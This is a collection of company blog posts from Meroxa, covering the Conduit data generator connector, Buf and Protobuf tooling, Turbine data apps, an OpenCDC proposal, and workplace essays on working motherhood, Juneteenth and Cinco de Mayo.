  ✔ Platform source fetched!
  ✔ Source uploaded!
  ✔ Successfully built Process image! ("fe983a75-fcb5-469f-a133-86647631ce85")
  ✔ Deploy complete!
  ✔ Application "meroxa-clearbit" successfully created!

And now we’re done!

Recap

This data app showed how easy data activation can be without requiring a user to stitch together a bunch of point solutions. With idiomatic code and the Meroxa Turbine SDK, we can now process and enrich data in real-time using the Clearbit API.

Using Conduit to Generate Fake Data for Streaming Systems

Haris Osmanagić — Tue, 02 Aug 2022 13:23:52 GMT

Testing streaming systems and architectures can be difficult because you need to mock data and have an upstream system continuously push that mock data. This post is about how to set up Conduit’s data generator connector.

The generator connector is built into Conduit. You don’t need to download an external connector to get started. The connector has a number of capabilities like controlling the content it generates (a struct or a file), the format (structured payloads and raw payloads) and the amount and frequency of data generated. With this connector, you’ll be able to test the flow of data through your streaming systems.

The example

Our example will be a simple pipeline, with a generator source and a file destination. The generator source will be generating records, which will then be written to a file.

Setting up Conduit

We will use the Docker image in this example (you can also download a binary or you can build the code yourself). Open up your terminal and run:

docker run -p 8080:8080 --rm  ghcr.io/conduitio/conduit:latest

That’s it, Conduit is up and running!

Creating the pipeline

We will use Conduit’s HTTP API to create the pipeline:

curl -Ss -X POST 'http://localhost:8080/v1/pipelines' -d '
{
  "config": {
  	"name": "my-pipeline",
    "description": "My pipeline"
  }
}' | jq -r .id

We use jq here to pretty-print the output and more easily spot the pipeline ID, which we will use in the next steps. You’ll get something like this:

{
  "id": "93d11532-504f-4591-b7b6-c130a54043ac",
  "state": {
    "status": "STATUS_STOPPED",
    "error": ""
  },
  "config": {
    "name": "my-pipeline",
    "description": "My pipeline"
  },
  "connectorIds": [],
  "processorIds": [],
  "createdAt": "2022-07-12T18:54:33.778965128Z",
  "updatedAt": "2022-07-12T18:54:33.778965128Z"
}

Creating the generator source

Run the following command to add a generator source to the pipeline.

curl -X POST 'http://localhost:8080/v1/connectors' -d '
{
  "type": "TYPE_SOURCE",
  "plugin": "builtin:generator",
  "pipeline_id": "93d11532-504f-4591-b7b6-c130a54043ac",
  "config": {
    "name": "my-generator-source",
    "settings": {
      "format.type": "structured",
      "format.options": "id:int,name:string,company:string,trial:bool",
      "readTime": "10ms",
      "recordCount": "5”
    }
  }
}

Let’s go over the configuration options for the generator source in this example (also described in the README):

format.type and format.options

These two parameters are both required and specify the contents of generated records. format.options has different meanings depending on format.type.

format.type can be structured, raw or file. If structured is used, records with structured payloads will be generated. In that case, format.options needs to be a list of name-type pairs, where type can be one of int, string, time, bool. The generator above will create records with structured payloads, where we will have an ID integer field, a name field (of type string), a company field (of type string as well) and a trial field (of type boolean).

Similar is true when format.type is raw. The only difference is that the structs will be serialized as JSON strings, and then converted to bytes.

To use a file as the payload, we need to set format.type to file. format.options is then expected to be a file path.

readTime

Simulates time needed to read a record. In this example, records will be read every 10 milliseconds.

recordCount

The number of records which the generator will generate, or -1 for no limit. In our example, 5 records will be generated.

burst.sleepTime and burst.generateTime

These two options make it possible to simulate bursts. With this, the connector can sleep for burst.sleepTime (not generating any records), then generate records for burst.generateTime, and then ut will repeat the same cycle. The connector always starts with the sleeping phase. The cycles will end when recordCount has been reached, or never (if recordCount is set to -1).

Example:

"readTime": "1ms",
"burst.sleepTime": "15s",
"burst.generateTime": "30s",
"recordCount": "2000"

Here, the connector will sleep for 15s. Then it will be generating records for the next 30s. Every record will take 1ms to be generated. Once 30s are over, the same cycle will be repeated. recordCount is set to 2000, meaning that the cycles will stop after 2000 records have been generated.

Creating the file destination

Now let’s create a place for all the generated records to be written to. We’ll configure a file destination:

curl -C POST 'http://localhost:8080/v1/connectors' -d '
{
  "type": "TYPE_DESTINATION",
  "plugin": "builtin:file",
  "pipeline_id": "93d11532-504f-4591-b7b6-c130a54043ac",
  "config": {
    "name": "my-file-destination",
    "settings": {
      "path": "/home/conduitdev/projects/conduit/file-destination.txt"
    }
  }
}

Starting the pipeline

Finally, let’s start the pipeline by executing the following command:

curl -X POST http://localhost:8080/v1/pipelines/93d11532-504f-4591-b7b6-c130a54043ac/start

Checking the results

Since we’re generating only 5 records, and are simulating a 10-millisecond read time, we should be able to see the records in the destination pretty much instantaneously. If you check the contents of /home/conduitdev/projects/conduit/file-destination.txt, you should see something like this:

{"company":"string 1","id":1562668947,"name":"string 1","trial":true}
{"company":"string 2","id":554929334,"name":"string 2","trial":false}
{"company":"string 3","id":691297882,"name":"string 3","trial":false}
{"company":"string 4","id":234317840,"name":"string 4","trial":false}
{"company":"string 5","id":1564914498,"name":"string 5","trial":true}

That’s all it takes! If you have any questions, suggestions, or just generally want to talk about streaming data, feel free to start a GitHub discussion or have a conversation with us on discord. And don’t forget to follow us on Twitter if you aren’t already.

How Conduit uses Buf to work with Protobuf

Lovro Mažgon — Thu, 07 Jul 2022 17:30:00 GMT

Conduit, our Kafka Connect alternative written in Go, uses Protobuf on two fronts:

To define the gRPC API,
It is the protocol used for communicating with standalone connectors.

However, we started facing challenges when working with Protobuf that impacted our developer experience, so we began looking for ways to resolve these problems. Continue reading to learn more about the challenges we faced and how we resolved them withBuf.

What is Protobuf?

Protobuf is the short-hand term for “protocol buffers”, a data format with an accompanying interface definition language. You can imagine it as XML or JSON, the difference being that the same data encoded with Protobuf generally results in a smaller memory footprint and better (de)serialization performance. Protobuf is commonly used as the data format in gRPC.

Challenges working with Protobuf

While Protobuf solves awhole set of problems it also introduces some challenges. These are the ones we ran into:

Managing Tools: To use Protobuf, you need to write a.proto file that describes the data structure you intend to serialize. Once you have a Protobuf file, you can run the Protobuf compiler to generate code in any of the supported languages. This in turn means you need to make sure you have the correct version of the compiler, as well as the correct version of any plugins you might need. Managing these tools quickly becomes a problem when multiple developers are involved since they need to ensure their environments are configured the same way.
Managing Dependencies: Protobuf files can import dependencies that need to be provided to the compiler at compile time. Developers are left on their own to figure out how to find existing Protobuf definitions, manage the dependencies, and ensure they are up to date.
Evolving the Schema: Data structures evolve, and so do Protobuf files. When you need to change the data structures in a Protobuf file there arerules you have to follow to ensure the new schema is backwards compatible. These rules are not enforced and are easy to miss.

What is Buf and how are we leveraging it?

Buf is a set of tools that aim to alleviate the challenges when working with Protobuf. We leverage the following tools to solve the above problems when developing Conduit:

Buf CLI comes with a built-in Protobuf compiler, linter, breaking change detection and formatter.
Buf provides Github Actions for setting up Buf, running the linter, detecting changes, and pushing Protobufs to their schema registry using the Github CI/CD system.
Buf Schema Registry is an online registry where you can push your Protobuf schemas. It will automatically generate a nice UI to browse the documentation of your schema, make it easily available to consumers to import as a dependency, and even automatically generate code so that consumers can entirely skip the compilation step (currently only available for Go).

Conduit Connector Protocol

Conduit has the ability to run connectors as plugins that don’t have to be included in the Conduit binary. Standalone connectors are invoked by Conduit and run in their own process that communicates with Conduit through gRPC (seethis document for more information). The gRPC service definitions and data structures are defined in the Github repositoryConduitIO/conduit-connector-protocol which is using Buf to manage Protobuf definitions. Here we will describe how we structured our workflow.

CI Actions

We use Github Actions provided by Buf to lint our proto files, detect breaking changes and upload them to the Buf Schema Registry. You can find the full workflow filehere.

Let’s first look at thevalidate job that contains the first two steps. First, we need to do some setup — we check out the repository (actions/checkout) and install the latest Buf CLI (bufbuild/buf-setup-action). After that, we are ready to call the lint action (bufbuild/buf-lint-action) that ensures our proto files follow the defined style guide.

After the lint is successful, we execute an action ensuring the new schema is backwards compatible with the old one. We achieve this by first fetching the main branch and executing the breaking action (bufbuild/buf-breaking-action) against the current content of the main branch.

If the validate job succeeds and the action is being executed on a commit to the main branch, then we trigger the job push.

You’ll notice this job also starts with the checkout and Buf setup actions, followed by the push action (bufbuild/buf-push-action) that takes a secret token to authenticate with the Buf Schema Registry and pushes the new Protobuf definitions.

These Github Actions result in a workflow that doesn’t rely on the developer having their local environment set up correctly, as the CI/CD is the single place where all Protobuf files are validated. Additionally, we don’t need to share secrets between developers, the CI/CD takes care of pushing schemas to the registry.

Schema Registry

We use the Buf Schema Registry to host the Protobuf definitions and get a UI for ourdocs. The registry also tracks old versions of the same schema file so anyone referencing an older version can keep using it or update to the new version usingbuf mod update.

Remote Code Generation

Pushing our Protobuf definitions to the Buf Schema Registry opens up the possibility of usingremote code generation. The registry will take care of generating the Go code for us and expose it as a go module, ready to be imported. This feature allows us to entirely skip the manual compiling step and simply import the compiled code as a dependency.

For instance, to fetch the latest Conduit connector protocol code we can invoke this command:

go get go.buf.build/protocolbuffers/go/conduitio/conduit-connector-protocol

Every time we update the Protobuf definitions and push them to the registry, the code will be remotely generated and ready to be used in any dependent code.

Local Development

Our workflow heavily leans on hosted services like Github Actions and the Buf Schema Registry, so the natural question is how can we do local development? The answer are go modreplace directives.

To switch to locally generated Protobuf code we follow the following steps:

buf generate — executing this in theproto folder will compile the proto files and generate Go code locally in the folderinternal
go mod init github.com/conduitio/conduit-connector-protocol/internal — executing this in folderinternal will initialize a (temporary) Go module in the newly generated Go code
go mod edit -replace go.buf.build/library/go-grpc/conduitio/conduit-connector-protocol=./internal — executing this at the root of the repository will replace any references to the remotely generated code with the locally generated code (similarly we can do this for other repositories that depend on remotely generated code)

Conclusion

Buf is a great tool that allows us to streamline the management of our Protobuf files, ensures we follow code guidelines and don’t unknowingly introduce breaking changes. It solves these problems in an elegant way and enhances the developer experience.

You know what else enhances the developer experience? Conduit! We’re still very much in the early stages and rely on the feedback of our community to steer the project in the right direction. Try it out… if you like it join the discussion and show us some love!

Being a Meroxa Mom

Jane Lombardi — Wed, 29 Jun 2022 14:17:00 GMT

We’ve all been pitched or at least heard of startup companies’ “perks.” Some of them include open vacation policies, unlimited sick leave, working the hours that are best for you (“as long as you get the work done, we don’t care”), and so many more. Many candidates leave the interview process feeling excited and motivated about these “perks,” but do they actually come to fruition once they land the job?

For some, yes. For others, I’m afraid no. Many companies are eager to pitch these perks, but the reality is often the complete opposite. Some employees find themselves working more hours than before, taking little to no vacation time, eating all meals in the office (because you know they are free), and working non-traditional hours to meet the demands of a hyper-growth startup.

It was the Fall of 2020 when I was first introduced to DeVaris Brown, CEO of Meroxa, as they were looking for a Head of People. I had just welcomed my first baby into the world in July and to be honest, was not eager or excited to go back to work just yet. I had just endured a covid pregnancy and just helped a company get acquired, an event that was a 24/7 job for three months straight. I was truly a little burnt out and thought maybe it was time I took a break from my professional career and spend my time at home raising my baby girl.

I preach to those I mentor the power of networking and how you should “always take the call” as you never know how that person could impact your life now or in the future. So, I took the call. My first conversation with DeVaris was casual, informative, and really was time used to get to know one another and really understand what he was looking for. I felt our conversation was genuine. I thought he was an easy guy to talk to and thought to myself, “you know, he is probably someone I could work with.” Still, though, even after having that initial positive experience, I left not really caring about the next steps or if he would ask me to proceed to the next rounds. (A very uncharacteristic behavior for me to feel, hello new mom emotions!) A few days later he reached out to me and asked me to conduct a panel interview with other Meroxa employees, I agreed to the call and we set it up.

My panel interview with the team went exceptionally well. They asked me questions I had never been asked before, they too were genuine, and I left the conversation excited. I then had a follow-up with DeVaris to really dig into the job itself and understand exactly what he needed out of this position. Note, at the time of my interviews, Meroxa only had about 12 employees. DeVaris also disclosed to me he was hiring a Head of Operations.

I allowed for a few days of self-reflection before asking DeVaris for an additional conversation. During those days of self-reflection, I came to the realization that I just wasn’t ready to jump back into a full-time position. I really wanted to focus on being the best Mom to my daughter.

Ultimately, I decided that during my next conversation with DeVaris, I would tell him he didn’t need a full-time Head of People just yet. My plan was to convince him to just hire me as a consultant and I could work as needed and as my busy life as a new Mom allowed. I knew I wanted to stay connected to this company as I believed in the founders, the product, and their vision. In my mind, a consultant was the perfect way to do that.

On my call with DeVaris, I did just that. I gave him my whole story (as described above), I told him I was not ready to commit to a full working day (and hours that come with that) and be away from my daughter at this time. He politely pushed back and asked why I couldn’t do both? He described to me that he wasn’t looking to demand a 14-hour work day from me, he wasn’t going to be bugging me at 2 AM on a “fire drill” that couldn’t wait, and he wasn’t looking to micromanage how I got my work done. Ultimately, he made it very clear that he respected my first job, being a mother, as the most important job I have.

Fast forward a few days later, I found myself accepting a job as the Head of People for Meroxa. Before signing, I was very clear that I wanted to be there when my daughter woke up each morning to feed her breakfast. I wanted to make her dinner at night, sit down with her at dinner, and most importantly tuck her in. This was all not only welcomed with open hands but encouraged. I felt comfortable accepting this offer because of the honest, open, and transparent conversation I was able to have DeVaris. I’ve firsthand seen and heard of so many moms wishing for this type of work-life relationship but never had the courage to speak to their manager about it and ultimately never saw it come to fruition. I am grateful to Meroxa and DeVaris for creating a culture where I feel comfortable expressing my needs and most importantly actually honoring those needs.

So in the spirit of full transparency because that is what we at Meroxa are all about, let’s talk about what a day in the life of Jane as a working Mom looks like. I have established clear, set, “working hours’’ in my calendar visible to everyone in the company. These working hours are from 10 AM-3 PM. What this means is that between 10 AM-3 PM, I have my most important meetings with my team and the rest of the company. It’s when I can guarantee a face-to-face Google Meet without a baby crying in the background or any other major type of distraction. I complete my other work which I categorize as “admin work” between the hours of 6 AM-8 AM before my daughter wakes up and again from 8:00 PM-10:00 PM after I put my daughter down for the night. Does this work for me? Yes. Does it work for every Mom? Maybe not. Most importantly, these hours are respected by my team and the entire Meroxa community. I feel fortunate every day to work for a company that REALLY means “family first.”

Juneteenth — The Impact of Misinformation & Action Items for the Workplace

Idalin Bobe — Thu, 16 Jun 2022 13:50:00 GMT

Misinformation is Not New

People often call our current era “The Age of Misinformation” or “The Misinformation Era,” where people share alternative facts, and depending on who you know and what you read, you will absorb certain truths. However, to call misinformation new is to forget moments in American history likeJuneteenth (short for “June Nineteenth”). Juneteenth marks the day when federal troops arrived in Galveston, Texas, in 1865 to ensure that all enslaved people were freed. Nearly 250,000 people were forced to remain enslaved in Texas two and a half years after President Abraham Lincoln freed enslaved people in the Confederate States through theEmancipation Proclamation.

Juneteenth is known as “Black Freedom Day.” Sadly, Juneteenth does not represent the end of slavery in America, as it is often reported. It specifically notes the end of slavery in Texas. Slavery continued to thrive in several border states and other states unaffected by the Emancipation Proclamation, including non-confederate States like Delaware, Maryland, Kentucky, Missouri, and West Virginia. Delaware wasthe last to free its nearly 2,000enslaved people on December 6, 1865, six months after Texas, due to the passing of theThirteenth Amendmentthat officially abolished slavery throughout all of the United States. And finally,in 1995, Mississippi was the last state to ratify the 13th amendment.

There is nothing wrong with commemorating Juneteenth; Black communities everywhere celebrate the holiday. However, America cannot confuse this holiday with progress and justice in the Black community. For centuries leaders like Dr. Martin Luther King Jr. fought for racial and economic justice and urgently called for theredistribution of economic and political power. Instead, America has given Black people street signs, named schools in honor of heroes, and holidays as people in this community still deal with voter suppression, educational, economic, and criminal injustice. If we are to celebrate Juneteenth, we must do it by organizing, learning, and demanding racial and economic justice. Without true justice, these holidays are absent from the systemic change needed in our society.

How to Address Misinformation and Juneteenth as a company?

As many companies give their employees the day off, we must reflect on the labor conditions Black people have been forced to participate in America, even after they were “freed.” The Black community has had to deal with Jim Crow laws, voter suppression, police brutality, redlining, and other practices that still, to this day, impede the rights of Black people living in America. Even with Juneteenth being a federal holiday, people with high-paying salaries, mostly non-Black, will have the day off while low-income hourly workers, mostly people of color, must work.

If you want to do more than encourage your employees to spend money at a Black-owned restaurant on Juneteenth, here are some other impactful actions your company can make:

Diversify your vendors and sign annual contracts with Black-owned businesses.
Start an apprenticeship program for marginalized adults looking to break into your industry and partner with amazing organizations like KuraLabs, Resilient Coders, and YearUP. They can help identify and match you with potential talent.
If your executive team lacks diversity, create an opportunity for marginalized people at your company to pair with your executives and train your next C-level executives. It may take you a few years to take effect, but it shows your company's commitment to having a diverse succession plan.
Create a scholarship fund for individuals of color in your local community to help them enter college or a trade program; it can start at $1,000.

Even as you do this, many people at your company, even your leaders, may not understand the importance of supporting these types of programs because they have been impacted by generations of misinformation which is an American reality. Much of America’s Black history has long been distorted. Since the beginning of the country’s inception, disinformation campaigns have been used to hide the truth about the legacy of slavery. Systemic policies continue to hurt Black communities and are used to diminish the contributions Black people have made in building America. Though it is not a company’s primary function to educate its employees and community, we encourage you to create space to host educational workshops with historians who can talk on topics and create an open space for dialogue around addressing misinformation.

Celebrating Juneteenth at Meroxa

On June 20th, Meroxa will observe Juneteenth as a holiday for all of its employees (U.S. and Non-U.S.) because racial and economic justice is embedded in our company’s DNA:

82% of leadership team members identify as a person from an underrepresented community
38% of the company identifies as a woman
62% of employees identify as a person of color (40% Black, 17% Latinx)
24% of employees are based outside of the US

Meroxa has a diverse team that spans around the world. That is why we hold ourselves accountable for taking time from work to understand the world, especially the social issues impacting marginalized communities. We are intentional about diversity, which is reflected in our team and vendor portfolio. And though we are a young startup, we launched our apprenticeship program in February 2022 to ensure we offer opportunities for Black and Brown people seeking to gain foundational career-building experience in the tech industry. Whether it is a holiday like Juneteenth or engaging in political education workshops, our hope at Meroxa is that our employees will continue to reflect and learn more about critical societal issues and ways to support the advancement of racial and economic justice.

As we enjoy our day off, we hope to continue to share information to help build a more informed and conscious world and workforce because the impact of misinformation has divided and polarized us for way too long.

A Tale of Two Apps: Web Apps and Data Apps

Simon Lawrence — Wed, 08 Jun 2022 19:54:00 GMT

With Web 2.0 being decades old even those outside of the software engineering world are familiar with the term. The success of Web 2.0 has led to systems that produce unprecedented volumes of data. This deluge of data has created the need for another type of app: the data app.

A data app is an application that uses real-time or near-real-time events to solve a problem. This is in contrast to web apps, which are focused on the classic and well-known HTTP request/response model. With web apps, the underlying data architecture and processing are offloaded to backend systems, separate from the frontend system with the UI for the end-user.

Data apps are the perfect solution to the growing complexity of data-driven applications and the complex data architecture required to process all that data. However, there is a lot of confusion around what makes data apps different from web apps.

In this article, we’ll compare web apps with data apps. We’ll look at their relationship with interaction models and how data apps might solve problems that web apps aren’t equipped to solve. We’ll close by looking at an example data app built usingTurbine.

Let’s dive in.

What is a Web App?

Generally speaking, most developers are familiar with the concepts surrounding web apps. Web apps use the classic HTTP request and response model to interact and generate data from user interaction.

In most cases, the REST API with its CRUD concept has become the de facto approach to dealing with the backend data flow and interactions generated by most web applications.

Typically, most web apps are made of a frontend, which is more UI-related, generating events and data, while the backend system of REST APIs and other supporting services deal with the processing and movement of the data.

What is a Data App?

A data app is an application that uses events to solve the same or similar data problems as the backend systems driving many web apps.

Data apps are more focused, seeking primarily to solve the following technical problems:

Persisting/syncing data and events between and on data infrastructure.
Transforming and manipulating data between and on data infrastructure.
Other common data processing tasks between and on data infrastructure.

In most web apps, the core functionality is often to create, consume, or present data. Data apps are a natural evolution towards better design, architecture, and support for the high-volume data-driven software world many developers and engineers find themselves in.

Data apps and architecture

One important aspect of a data app that distinguishes it from a web app isthe tightening of concerns between infrastructure and code. While web apps typically involve both a front-end layer and a back-end layer, data apps operate on the back-end only, interacting directly with the data infrastructure. With the common use cases of real-time or near real-time data, the complexity of the code and the architecture built to support these high-volume data sets has become a serious burden and hurdle for many developers.

Interaction Models

Before diving further into data models, let’s take a side tour of a topic related to software design: interaction models. In this context, interaction models can help us understand the fundamental differences between web apps and data apps. We’ll look at the two major types of interaction models: user-to-system interactions and system-to-system interactions.

User-to-system interaction models

User-to-system interaction models are common in the software design of web apps. With the rise in popularity of UX design, we’ve seen an increased emphasis on the interaction between the end-user and the system (the web app).

In this context, software design is all about modeling the system in a way that helps the end-user interact with the application to perform certain tasks. This could simply be the way a user navigates and interacts with a page or performs certain actions and updates to the system.

System-to-system interactions models

On the other hand, the system-to-system interaction model has an entirely different goal in mind. System-to-system interactions are oftenmodeled around how different pieces of infrastructure interact and work together to analyze and process data.

Consider a real-world example: a continuous incoming stream of user clicks from a frontend system that must be processed and made available in a company’s Data Lake for analysis by downstream business units.

Closing the gap between web and data apps

For today’s web apps, a common area of complexity and limitation centers around the system-to-system interaction model. While web apps thrive at addressing user-to-system interactions, the lines can get blurry when it comes to processing the data generated by those interactions.

At a high level, many questions arise when engineers and developers try to hash out responsibilities when it comes to data processing. How much data transformation and handling can be done by the web app? Should the web app do any of it, or should all data be handed off to other systems to process?

As an example, the engineers working on web apps typically aren’t deeply familiar with the complexities of streaming data processing. Often, this sort of work is handed off to another backend system and a team that is responsible for data processing.

How can data apps solve these complex data processing problems while retaining the familiarity of web apps in code and project structure? One of those ways is withturbine-py, a Python package built specifically for creating data apps.

But first, let’s dive into the benefits that data apps provide and how they help engineers solve complex data processing problems.

How Data Apps Solve Problems

It’s well known that streaming with real-time or near-real-time data processing is important for modern data processing applications, but it’s also incredibly complicated. Data apps solve these issues by handing off the complexity of the underlying streaming infrastructure.

Data apps are built in such a way that they can handle event-driven streams of data, respond in real-time, and scale to use cloud-native best practices. Engineers can focus on building applications that solve complex problems rather than worrying about the complexity of processing streaming data or the infrastructure needed to support those technologies. Typically, managing these technologies correctly requires a dedicated team of engineers.

Benefits of Data Apps

Data apps — like those built with Turbine — have several benefits that extend from this reduction of complexity.

First, by allowing developers to focus on code rather than on managing complex infrastructure and cloud-related operations, data apps free up time and energy for developers so that they can focus on the code that matters: the application code itself.

Also, the speed at which new engineers can become familiar with and contribute to codebases increases dramatically. When less time is spent understanding streaming architecture and managing those resources, more effort can be spent on the core of the application logic.

Let’s look at a simple data app built using Turbine to see these benefits in action.

Example of a Data App Using Turbine

Currently, Turbine data apps can be written withGo,Python, JavaScript, and Ruby In this example, we will use Python. We’ll solve a data processing problem that is common for many organizations.

In our sample problem, we have streaming records generated by our users in a web app, and those records need to be processed into a Data Lake, with transformation applied for later analytics by business users.

Turbine fits the use case for this problem perfectly, providing a data app framework for responding to real-time data while being able to scale in the cloud.

Tooling setup

First, we install the Meroxa CLI to help with the scaffolding of a Turbine data app. We follow theseinstallation instructions. Weset up our Meroxa account and then log in via the CLI.

$ brew tap meroxa/taps; brew install meroxa

Next, we install theturbine-py package. Then, we initialize our Python data app, creating a clean template.

$ pip3 install turbine-py

$ meroxa app init data-warehouse — lang python — path ~/src

Now we are ready to start developing our Python data app! When we initialized our app, the following files were automatically generated for us as our template:

- main.py
- app.json
- __init__.py
- fixtures
— demo-cdc.json
— demo-no-cdc.json

Writing our first Turbine data app

There are five important concepts for writing Turbine data apps, which include:

Turbine class (provides need functionality)
Data processing function(s)
Resources (datastores)
Records (collection of data)
Write (push data out)

TheTurbine class itself provides access to the necessary components to build your data app with minimal code. Of course, you will have one or moredata processing functions or methods to apply transformations to your records.

Resources in Turbine will allow you to connect to your data sources.Records are simply a collection of data that your data app will process. Lastly,writing will push the processed data back out of the data app. You canconfigure your Resources and Destinations in Meroxa.

Since we don’t need to worry about the complexity of consuming a stream of records or the technical requirements related to the source streaming technology, we can focus on writing the transformation function that takes individual records and transforms them as needed.

Writing the Code

We will write the code for our data app in main.py, which will be our entry point.

First, we will import the needed Python packages into our main.py code.

from turbine import Turbine
from turbine.runtime import Record

Next, we will write our Python class that inherits from the Turbine class to process our streaming user records.

class DataLake:
	@staticmethod
    async def run(turbine: Turbine):
        source = await turbine.resources(“user_activity”)
        records = await source.records(“click_stream”)
        processed = await turbine.process(records, transform)
        destination_db = await turbine.resources(“data_lake”)
        await destination_db.write(processed, “user_analytics”)

This simple class is straightforward to follow, as the Turbine data app abstracts away the details of complex stream processing. There are four simple steps encapsulated inside our run method.

Connect to a Meroxa-configured source system.
Pull streaming records from the source.
Transform the streaming records as needed, yielding the set of processed records.
Connect to a Meroxa-configured destination to write our processed records.

With the data flow of our app written, the only remaining step is to write the transformation function that will process our streaming user records. In our example case, our clickstream records contain a field with first and last names concatenated together, like “John Doe.” We simply need to split this field into separate records — first_name and last_name — before ingesting it into a Data Lake.

def transform(user_stream: t.List[Record]) -> t.List[Record]:
	updated = []
	for user_click in user_stream:
		user_click_to_update = user_click.value
		full_name = value_to_update[“payload”][“user”][“name”].split(‘ ‘)
		first_name = full_name[0]
		last_name = full_name[1]
		updated.append(
		Record(key=user_click.key, value={“first_name” : 
			first_name, “last_name”: last_name}, timestamp=user_click.timestamp)
		)
		return updated

With a little configuration and setup,our Turbine data app can ingest and process complex streaming data, and it does so with very few lines of code!

Conclusion

Data apps, though relatively new, bring with them a whole host of benefits. These benefits include the efficiency and streamlining of processes along with the simplicity of onboarding new engineers. Building data apps with a tool like Turbine is a perfect approach to today’s complex real-time and near-real-time data processing needs. The ability to approach a normally complicated data problem with a straightforward codebase — while offloading the complexity related to architecture and streaming data — is a game-changer for developers.

A Proposal for Better Interoperability with Change Data Capture

Ali Hamidi — Thu, 02 Jun 2022 16:39:00 GMT

What is Change Data Capture?

Change Data Capture (CDC) is a general term for a mechanism that communicates not just the current state of some data in an upstream resource, but the actual operation that caused the change in that data.

Consider the case of traditional (non-CDC) data integration, where we have a pipeline that is pulling records from a Postgres operation database at some regular interval. In this case, what you end up with is a series of snapshots of what the database looked like whenever that particular interval lands.

A small improvement would be incremental syncing, where we look only for new records and pull those instead of every record each time. This is surely better since it is (generally) magnitudes more efficient.

However, CDC can improve this further by not only providing new records but any record that was changed and it will also update details around the operation that triggered the change. An example of this would be we have a record that was updated (i.e. a single field was updated with a new value). CDC can provide additional metadata indicating that the record was an update and depending on the resource/tooling can even capture the before and after states, highlighting the exact change.

It’s clear that CDC provides numerous advantages, so why isn’t it used everywhere for everything?

Kafka Connect and CDC Right now

We can’t really discuss CDC without talking aboutDebezium. Debezium is the umbrella project for a collection of Kafka Connect connectors focused on CDC maintained by the team at Red Hat.

In our opinion, the Debezium connectors are excellent. They’re well designed, battle-tested, and well documented.

Here’s an example of a CDC record from the Debezium Postgres Source Connector:

{
  "schema": { ... },
  "payload": {
	"before": {
	  "id": 1,
	  "first_name": "Anne Marie",
	  "last_name": "Kretchmar",
	  "email": "oldemail@example.com"
	},
    "after": {
      "id": 1,
      "first_name": "Anne Marie",
      "last_name": "Kretchmar",
      "email": "newemail@example.com"
    },
    "source": {
      "version": "2.0.0.Alpha1",
      "connector": "postgresql",
      "name": "PostgreSQL_server",
      "ts_ms": 1559033904863,
      "snapshot": false,
      "db": "postgres",
      "schema": "public",
      "table": "customers",
      "txId": 556,
      "lsn": 24023128,
      "xmin": null
    },
    "op": "u",
    "ts_ms": 1465584025523
  }
}

In this example, a user’s email has been updated in-place, so anupdaterecord (“op”: “u”) was emitted showing the previous email (oldemail@example.com) and the new one (newemail@example.com).

Using the Debezium connectors, you can build downstream apps that consume this data and intelligently act on each type of operation.

Where things start to fall apart is once you start looking into the sink (or destination) side of data integration. Very few Kafka Connect sink connectors can take advantage of the CDC data provided by the Debezium connectors.

In many cases you’re forced to use a providedtransform to “unwrap” the records (effectively stripping away all of the CDC data), leaving only the final (”after”) state of the record.

The practical implications of this are you lose the ability to map updates and deletes and are often left with append-only style inserts.

Here’s what the previous CDC record looks like after it has beenunwrapped so that it can be pushed down to sink connectors:

{
  "schema": { ... },
  "payload": {
    "id": 1,
    "first_name": "Anne Marie",
    "last_name": "Kretchmar",
    "email": "newemail@example.com"
  }
}

What’s the ideal situation?

Ideally,all sink/destination connectors will supportall CDC operations and map them to whatever makes sense for the resource. If the resource can support updates, then update the correct record. If it can’t, you can create a new record with the operation included as a field.

This way resources such as operational databases can be kept in sync (with updates and deletes being applied) and append-only behavior (if desired e.g. for compliance) can still be enforced but optionally at the sink instead.

What is OpenCDC?

In order to move the community toward the goal of ubiquitous CDC interoperability, Meroxa is proposing at least initially a set of guidelines under the project name OpenCDC.

Specifically, we’re advocating for standardizing on a minimal set of CDC operations loosely based on those introduced by the Debezium connectors:

Create (c) - Newly created records
Read (r) - Records read as part of a snapshot
Update (u) - Records that have been updated
Delete (d) - Records that have been deleted

The above list provides a base starting point. There are compelling arguments for supporting (and distinguishing) additional operations such as DDL operates and/or resource-specific operations such as truncate.

What’s Next

We want to shape these guidelines based on input from the community. If you’re interested in helping to define these guidelines, contact us atinfo@meroxa.com with the subject lineOpenCDC or connect with us onDiscord.

FAQ

Why “guidelines” and not a standard? Our long-term goal is to ultimately have a standard or specification for OpenCDC, but to get there we first need to land on the set of core operations to support. By starting with guidelines, we’re able to shape these guidelines based on input and feedback from the community.
Is OpenCDC a format? The term “format” is overloaded in the data integration space and we’re wary of using it in the context of OpenCDC. Ideally, OpenCDC would be a specification for the contents of the OpenCDC record (i.e. the fields themselves and their data types). The actual format would be independent where the record could be encoded into Avro, Protobuf, or JSON.
Who is involved with this? We’re currently talking to a large (and growing) list of organizations that share our interest in delivering CDC interoperability. If you’re interested in getting involved, please reach out to us atinfo@meroxa.com or jump into ourDiscord server.
Who “owns” OpenCDC? Our intention is to operate OpenCDC as a community-driven project. Ideally, one that is governed by an established foundation such as the CNCF or similar.

Hold the Guacamole: Rethinking Cinco de Mayo

Idalin Bobe — Thu, 05 May 2022 18:27:00 GMT

Cinco de Mayo is here, and though many people make reservations with friends to eat at their favorite taco spot, let’s hold the guacamole and margarita and take time to honor Mexican heritage.

Two Truths and A Lie:

Mexican heritage is NOT about drinking.
Most Mexicans don’t celebrate Cinco de Mayo.
Cinco de Mayo is Mexico’s Independence Day.

Sadly, many people in America celebrate Cinco de Mayo because they think its Mexico’s Independence Day. However, September 16 is Mexico’s Independence Day. Cinco de Mayo is a day to honor the Battle of Puebla Day, commemorating the defeat of Napoleon III in 1862.

How Did Cinco De Mayo Celebrations Get Started in the U.S.?

In the 1960s, Chicano activists in the U.S. wanted to stand in solidarity with the civil rights movement and reclaim a time where people united, against all odds, to defeat colonialism — AND WON! The Chicano activists in the Southwest and west coast of America celebrated Cinco de Mayo to reclaim history and honor the mostly poor, primarily Afro-Mexican and indigenous soldiers, who fought against a mighty European colonial force.

The civil rights movement in the United States of North America called for solidarity across all working-class communities, especially Black and Brown communities. During this era, leaders like Cesar Chavez and Dolores Huerta organized farmworkers, undocumented youth, and housing advocates to stand up for human rights. In a ploy to grow closer to this young and vibrant growing population, corporate America promised to make donations across several organizations in exchange for joining the Cinco de Mayo celebrations. Sadly, it wasn’t long before mass marketing campaigns took over the day and co-opted the movement with Drink-O-Mayo slogans. By the 1990s, thanks to the commercialization of the day, many people in America had no idea what Cinco de Mayo represented, but we knew it was a day to celebrate with a drink.

